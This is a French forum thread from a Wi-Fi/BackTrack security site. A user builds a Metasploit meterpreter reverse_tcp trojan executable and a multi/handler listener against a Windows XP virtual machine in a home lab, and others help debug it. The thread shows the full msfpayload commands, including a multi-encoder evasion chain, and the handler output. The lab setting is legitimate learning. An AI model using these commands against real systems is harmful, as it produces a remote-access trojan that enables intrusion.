LE FORUM DU SITE
Wifi, Backtrack, crack WEP et WPA...
Vous n'êtes pas identifié(e).
Bien le bonjour la communauté !
Je suis en train de tenter d'apprendre a me servir de metasploit sans ses interfaces graphiques mais je tombe face a un soucis. Côté configuration: réseau local avec Ubuntu et Windows XP relié par pont réseau au wifi (les machines se ping sans problème et possède des adresses IP correcte).
Voici mes commandes ainsi que ce qu'elles sont censées faire:
Création du .exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=46666 RPORT=46666 > JeSuisPasGentil.exe
Aucune erreur n'est signalé.
Lancement du serveur metasploit en écoute
msfcli multi/handler LHOST=192.168.1.7 LPORT=46666 PAYLOAD=windows/meterpreter/reverse_tcp E
Le serveur se lance bien et n'affiche aucune erreur:
LHOST => 192.168.1.7
LPORT => 46666
PAYLOAD => windows/meterpreter/reverse_tcp
[*] Started reverse handler on 192.168.1.7:46666
[*] Starting the payload handler...
Après je tape le .exe sur la machine virtuelle (windows XP SP2 type lsd) et le lance. Un shell se lance bien sur la machine virtuelle, mais rien d'autre ne se passe (la connexion n'arrive pas jusqu'au serveur). Ne voyant pas d'où peut provenir mon erreur, je me demande si ce ne serait pas dû a Ubuntu.
Merci d'avance pour votre aide.
Cordialement.
VoxPopuli
Dernière modification par voxpopuli (21-12-2011 14:52:28)
Hors Ligne
Ca ressemble à un problème de pare-feu, travailler en machines virtuelles (même via un pont réseau) ne facilite pas les choses...
Commence par vérifier que tu peux contacter le port 46666 de ta machine attaquante depuis ta machine victime. Par exemple tu lances le payload handler que tu laisses en attente, et depuis la machine victime tu essaies un telnet sur l'IP/port en question. Ca serait plus efficace de faire ça avec Netcat ou Ncat, mais il faut les installer alors que Telnet est déjà dispo
Tu peux aussi regarder avec Wireshark sur la machine victime à quoi ressemble le trafic sur le port 46666.
Une dernière chose : on est bien d'accord que tu n'as pas un antivirus/pare-feu actif sur la machine victime ?!
Hors Ligne
Oui je confirme, aucun pare-feu sur la machine virtuelle (pare-feu windows désactivé et pas de pare-feu ni AV additionnel).
Je viens de faire une connexion avec telnet sur le serveur attaquant, les deux semblent bien réagir (le telnet m'affiche le code de se qu'il reçois, un art fort abstrait ^^, tandis que le serveur m'indique qu'il à envoyé sa payload).
Je vais tenter de forger le fichier infecté sur Backtrack pour voir si ce ne serait pas un problème d'incompatibilité avec Ubuntu (se qui serait étrange vu que j'ai déjà fais des test avec msfconsole et armitage et qu'ils s'étaient montré concluant).
PS: en parlant de Netcat, tu aurais une idée d'où je peux le trouver en version saine pour windows? Cet outil est vraiment génial pour le bidouillage.
Dernière modification par voxpopuli (21-12-2011 15:04:33)
Hors Ligne
Que te renvois le résultat de la commande telnet exactement?
Je vais tenter de forger le fichier infecté sur Backtrack pour voir si ce ne serait pas un problème d'incompatibilité avec Ubuntu (se qui serait étrange vu que j'ai déjà fais des test avec msfconsole et armitage et qu'ils s'étaient montré concluant).
En effet je pense pas que ce soit ça pour avoir utilisé metasploit sur unbutu, quand tu dis "forger le fichier infecté" tu comptes encoder ton .exe ou le modifier avec d'autres techniques?
Hors Ligne
A la base, j'ai voulu tester msfpayload et msfencode avec la commande suivante:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=46666 C EXITFUNC=seh | msfencode -t exe -c 15 -e x86/shikata_ga_nai | msfencode -t exe -e x86/call4_dword_xor -c 10 | msfencode -e x86/countdown -c 10 -t exe > test.exe
Mais comme cela ne marchait pas, j'ai voulu utiliser msfpayload seul afin de trouver où se situe le problème.
Avec le telnet, le serveur réagis:
[*] Started reverse handler on 192.168.1.7:46666
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.3
Euh,pour la commande telnet, je crain que se ne soit trop long pour poster tout (elle a dépassé la centaine de ligne après a peine 3 secondes ^^). Pour résumer, la fin de la fenêtre telnet affiche cela
:¶:?:$:,:4:<:D:L:T:\:d:l:t:|:ä:ö:£:ñ:Œ:Š:+:-:Š:È:_:õ:ý:¶:³:?;
;¶;?;$;,;4;<;D;L;T;\;d;l;t;|;ä;î;ö;£;ñ;Œ;Š;+;-;Š;È;_;õ;¶;³;?<
<¶<?<$<,<4<<<D<L<T<
\<d<l<t<|<ä<î<ö<£<ñ<Œ<Š<+<-<Š<È<_<õ<ý<¶<³<?=
=¶=?=$=,=<=D=L=T=\=d=l=t=|=ä=î=ö=£=ñ
=Œ=Š=+=Š=È=_=õ=ý=¶=³=?>
>¶>?>$>,>4><>D>L>T>\>d>l>t>|>ä>î>ö>£>Œ>Š>+>->Š>È>_>õ>ý>¶³
>
?¶???$?,?4?<?D?L?T?\?d?l?t?|?ä?î?ö?£?ñ?Œ?Š?+?-?Š?È?_?õ?ý?¶?³?ð
H??0
0¶[email protected]
\0p0t0ê0î0á0ñ0©0+0ð0È0¶0°0³1
1?101D1H1L1P1T1X1d1h1l1p1t1Ç1ä1î1É1ö1ÿ1£1á1ñ1¿1Œ1Š1Š
1T2X2\2`2l2p2t2x2ä2ê2á2ñ2¿2Œ2Š2Š2©2+2+2-2+2Š2ð2È2Ï2_2Ó2õ2Þ2ý22¶2°2³23?3
3?3¶33?3
3$3(3,30383<3?4¶4 [email protected]\4d4h4p4t4|4Ç4ê4î4ñ4¿4Š4Š4+4+4+4Š4È4Ï4Ó4õ4ý
4°4³4¶55 5$5,50585<5D5H5P5T5\5`5h5l5t5x5ö5ÿ5 6,686D6P6\6h6t6Ç6î6ÿ6ñ6Š6+6+6È6Ó6ý°
6?7?7?7([email protected]|7ê7ö7á7Œ7©7-7ð7_7Þ7¶78
88$808<8H8_9Ó9õ9Þ9ý99¶9°9³9:?:
:?::?
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:Ç:ä:ê:î:É:ö:ÿ:£:ñ:¿:Š>Š>©>+>+>-
>+>Š>ð>È>Ï>_>Ó>õ>Þ>ý>>¶>°>³>???
???¶???? ?(?,?8?<?ä?È?Ï?Ó
h 0p0t0
1?1X1¿1Œ1D2H2Ó2õ
2|3Ç34?4Š4©4P5T5ý55h7t7Ç7î7ÿ7ñ7Š7+7+7È7Ï7d8h8<[email protected]_9Ó9õ9Þ9ý99¶9°9³9:
?Ç1ê1H5T
5\5d5l5t5|5ä5î5ö5£5ñ5Œ5Š5+5-5Š5È5_5õ5ý5¶5³5?6`6d6h6l6p6t6x6|6Ç6ä6ê6î6©:Š;<(<8<H<
X<|<ê<î<É<ö<ÿ<á<ñ<P=T=`>d>h>l>p>t>x>|>Ç>ä>ê>î>É>ö>ÿ>£>á>ñ>¿>Œ>Š>Š>©>+>+>->+>Š>ðÈ
>Ï>_>Ó>õ>Þ>ý>>¶>°>³>???
?á?ñ?¿?Œ?Š?Š?©?+?+?-?+?Š?ð?È?Ï?_?Ó?õ?Þ?ý??¶?°?³?
L0?0
0?0
¶00?0 0$0(0,0004080<[email protected]`0h0l0p0t0x0|0Ç0ä0ê0î0ÿ0
Dernière modification par voxpopuli (21-12-2011 15:24:38)
Hors Ligne
OK, donc la connexion passe, c'est déjà ça... Du coup je sais pas trop pourquoi l'attaque ne fonctionne pas, tu saurais essayer avec msfconsole plutôt que msfcli ? Tu devras taper les arguments 1 à 1 donc ça devrait donner ceci :
- use multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.7
- set LPORT 46666
- exploit
Au passage, je pense que j'ai trouvé d'où vient l'erreur : quand tu génères ton trojan, tu dois utiliser RHOST pas LHOST. LHOST correspond à l'hôte Local sur lequel il faut écouter, mais dans le cas d'une connexion en reverse c'est la victime qui démarre la connexion vers le serveur ; il faut donc spécifier l'adresse RHOST (R comme Remote) du serveur à joindre
Essaie avec cette commande :
msfpayload windows/meterpreter/reverse_tcp RHOST=192.168.1.7 LPORT=46666 RPORT=46666 > JeSuisPasGentil_EtEnPlusJeFonctionne.exe
(je pense que le LPORT ne sert à rien mais bon, il ne pose pas de problème non plus)
Pour netcat, cherche le fichier "nc111nt" sur Google, c'est la version 1.11 de Netcat pour Windows, tu devrais même pouvoir retrouver des sources VisualC++ si tu veux le recompiler toi-même Perso je préfère travailler avec Ncat, qui est une amélioration par l'équipe de Nmap. Il est plus lourd mais je le trouve plus complet, tu peux le télécharger en même temps que tous les binaires Win32 sur le site de Nmap
--> Ncat, le successeur de Netcat/Cryptcat
@koala : telnet va lui renvoyer le payload binaire mais affiché comme de l'ASCII donc on ne saura rien en déduire Surtout que si le payload fait 300k, on aura 300.000 caractères mais qui n'ont aucun sens
Au passage, je pense que oui il peut y avoir des différences entre Metasploit sur Ubuntu et sur BackTrack : Metasploit est très sensible à la version de Ruby utilisée, tout est bien affiné sous BackTrack (encore que...), mais ce n'est pas forcément le cas sous Ubuntu !
Hors Ligne
Je viens de tester ta commande. Quand je ne met pas LHOST, j'ai l'erreur suivante:
Error generating payload: The following options failed to validate: LHOST.
J'avais déjà testé en rempalcant RHOST par LHOST (je m'étais fais la même remarque), mais l'erreur m'a fais pensé que je me gourais. Par contre, le fichier a bien été créé, mais n'est pas bon du tout. Windows me dis que le programme n'est pas une application valide, et la commande file me répond que le programme est vide.
[email protected]:/home/voxpopuli/programmation/securite# file JeSuisPasGentil_EtEnPlusJeFonctionne.exe
JeSuisPasGentil_EtEnPlusJeFonctionne.exe: empty
Je vais tester avec backtrack voir s'il n'y aurait pas un bug lors de la génération du payload (j'avais lu quelques part que les encodeurs buggaient sur Ubuntu), mais mes pauvres 2Go de RAM vont encore être dépassé ^^.
Edit:
Et bien j'ai la même erreur sur Backtrack, la commande réclame LHOST pour fonctionner. Pour tester, j'ai mis LHOST=0.0.0.0, LHOST=adresse_IP_victime, rien n'y fais. De plus la commande file me répond que le fichier est de type data:
[email protected]:/home/voxpopuli/programmation/securite# sudo file JeSuisPasGentil_EtEnPlusJeFonctionne.exe
JeSuisPasGentil_EtEnPlusJeFonctionne.exe: data
Vraiment étrange.
Dernière modification par voxpopuli (21-12-2011 17:36:42)
Hors Ligne
Essaies tout simplement avec la commande suivante :
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=46666 x > JeSuisTresGentil.exe
Ensuite tu lui donne des droits d’exécution:
chmod +x JeSuisTresGentil.exe
Dernière modification par Fuji (21-12-2011 19:59:56)
Hors Ligne
Ahhhh, niquel ça marche !
Il me manquait l'option "x". Peux-tu me dire son utilité stp?
Pour le chmod +x, il n'est utile que si je souhaite exécuter un script sur linux, hors dans ce cas le .exe doit être exécuté sur windows
Dernière modification par voxpopuli (21-12-2011 21:01:34)
Hors Ligne
Arf, le c*n chui passé à côté de ça Bien vu Fuji
Le dernier argument de la commande msfpayload sert à définir le type de sortie, c'est expliqué dans l'aide (msfpayload -h) :
- X pour un eXécutable (windows)
- R pour une sortie brute (Raw) que tu rediriges par exemple vers msfencode
- C pour du code C (je crois)
- P pour un script Perl
- RUB pour un script Ruby
- J pour du javascript
- D pour une DLL Windows
- V pour du VisualBasic
- W pour "war" mais je ne sais pas à quoi ça correspond, un lien avec wargame peut-être...
Comme tu ne précisais pas de type, je suppose qu'il sortait du RAW par défaut donc évidemment ce n'était pas exécutable...
Hors Ligne
Je vous remercie grandement de m'avoir aidé a solutionner mon problème
Hors Ligne
Discussion | Réponses | Vues | Dernier message |
---|---|---|---|
Client avec LINKSYS WRT54GL par GClaire
|
2 | 918 | 19-04-2018 04:49:54 par hermelan |
probleme alpha networks r36 par jon12
|
5 | 273 | 16-04-2018 20:04:58 par Henri |
Hostapd avec une Awus036ACH par Bob36180
|
2 | 262 | 30-03-2018 15:25:35 par Bob36180 |
Carte wifi compatible avec hostapd ? par rifianno
|
2 | 469 | 25-03-2018 22:02:40 par rifianno |
Probleme fluxion par matox74
|
1 | 666 | 07-03-2018 20:03:01 par kcdtv |